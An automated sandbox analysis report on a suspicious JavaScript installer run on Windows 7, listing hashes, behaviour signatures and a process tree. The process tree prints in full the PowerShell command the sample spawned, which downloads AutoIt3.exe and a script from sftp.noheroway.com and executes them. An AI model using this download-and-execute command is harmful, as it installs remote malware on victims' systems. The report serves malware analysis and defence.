Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
31-10-2023 15:32
Static task
static1
Behavioral task
behavioral1
Sample
31102023_2331_StartInstaller.js
Resource
win7-20231023-en
4 signatures
150 seconds
General
-
Target
31102023_2331_StartInstaller.js
-
Size
135KB
-
MD5
ddcba7389f0d1e6f2136434337077180
-
SHA1
767db09b9d97cbc4f302ec9b994541630da91d32
-
SHA256
3a9494dd4b5de532abfffc60639bd1347e41f60582954a14d7c1e32ede07d8b0
-
SHA512
0a7ed12a97e414bb2cbbd99243000ffef58b1c79ef87da8d43633b8968d0a397d77b21d1c4ee62290ebbd5c940016953a80e41f8ffa9ebad21f718a1ef064bba
-
SSDEEP
1536:hZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/04:UT9U7hgaX6eerjqlI2IO6Mzqffxu
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 1280 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 1280 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid Process procid_target PID 2176 wrote to memory of 1280 2176 wscript.exe 28 PID 2176 wrote to memory of 1280 2176 wscript.exe 28 PID 2176 wrote to memory of 1280 2176 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\31102023_2331_StartInstaller.js1⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443/msitgileccg' -OutFile 'tgileccg.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'tgileccg.au3'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1280
-